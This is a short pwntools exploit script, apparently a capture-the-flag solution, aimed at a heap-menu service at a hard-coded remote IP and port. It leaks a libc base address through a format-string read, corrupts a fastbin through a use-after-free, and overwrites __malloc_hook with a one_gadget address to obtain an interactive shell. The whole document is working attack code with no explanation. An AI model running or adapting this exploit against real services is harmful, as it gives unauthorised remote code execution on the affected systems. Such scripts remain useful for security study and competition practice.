1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| from pwn import * p=remote("183.129.189.60",10002)
context.log_level="debug" libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def create(index,content): p.sendlineafter('Your Choice:',"2") p.sendlineafter('Your Choice:',"1") p.sendlineafter('index:',str(index)) p.sendafter('color:',content)
def edit(index,content): p.sendlineafter('Your Choice:',"2") p.sendlineafter('Your Choice:',"0") p.sendlineafter(":",str(index)) p.sendafter('color:',content) def free(index): p.sendlineafter('Your Choice:',"3") p.sendlineafter('index:',str(index))
p.sendlineafter('Your Choice:',"1") p.sendlineafter('draw:',"%15$p") p.recvuntil('0x') libc_base=int(p.recv(12),16)-(0x7f7e0aafb830-0x7f7e0aadb000) success("libc_base===>0x%x"%libc_base) create(0,'11111') free(0) edit(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23)) create(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23)) onegad=[0x45216,0x4526a,0xf02a4,0xf1147] create(1,'\x00'*(0x13-0x8)+p64(libc_base+onegad[3])+p64(libc_base+onegad[3])) free(0) p.sendlineafter('Your Choice:',"2") p.sendlineafter('Your Choice:',"1") p.sendlineafter('index:','0')
p.interactive()
|